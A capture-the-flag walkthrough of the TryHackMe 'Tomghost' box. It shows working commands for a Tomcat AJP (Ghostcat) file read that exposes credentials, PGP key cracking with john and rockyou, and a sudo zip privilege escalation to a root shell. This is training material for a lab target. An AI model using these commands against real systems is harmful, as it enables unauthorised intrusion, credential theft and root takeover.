Tomghost - TryHackMe Walkthrough
Identify recent vulnerabilities to try exploit the system or read files that you should not have access to. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
We are given the IP 10.10.31.90. Run an nmap scan with the following command:
nmap -p- -A -o portscan 10.10.31.90
These are the open ports:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.30
Here is port 8080 on my browser:
This seems to just be the Apache installation index page.
I have never seen port 8009 open, so I will investigate this.
AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat.
By default, Apache Tomcat listens on 3 ports, 8005, 8009 and 8080. A common misconfiguration is blocking port 8080 but leaving ports 8005 or 8009 open for public access.
I will be using this tool on github to exploit this vulnerability:
Let’s download the raw code onto our local machine:
We have the script ajpShooter.py.
This is the command to read a file:
python3 ajpShooter.py http://10.10.31.90:8080 8009 /WEB-INF/web.xml read
There are some credentials:
We saw earlier that port 22 was open, let’s try and ssh using the credentials we just discovered. The password seems to just be plaintext, I don’t recognise any encryption.
We are successfully logged in as skyfuck.
The home directory has another user called merlin. We also have the user flag.
cd .. ls cd merlin cat user.txt
I noticed a pgp file in skyfuck’s home directory:
We also have tryhackme.asc which has a PGP PRIVATE KEY BLOCK:
I will transfer these files to my local machine so I can attempt to decrypt the file.
scp [email protected]:/home/skyfuck/* .
scp is a way to transfer files across a network using ssh. Read more about this here:
Here is a youtube video explaining how to crack a PGP Private Key Password.
We will be converting the tryhackme.asc file using the tool gpg2john.
gpg2john tryhackme.asc > hash
This is what my hash file contains:
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc
Now let’s use john to crack this file. I used the rockyou.txt wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
We have some results:
Now that we have this key, let’s go back to the ssh session and decrypt the pgp key.
gpg --import tryhackme.asc gpg --decrypt credential.pgp
We have some credentials:
Change the user and use those credentials:
Check to see the users sudo rights:
We need to priv esc using the zip binary. I did some research on ZIP Privilege Escalation and found this article:
So let’s create a new file with touch:
Then exploit this using the following command:
sudo zip 1.zip f3dai.txt -T --unzip-command="sh -c /bin/bash"
We have spawned a root shell, and found the root flag.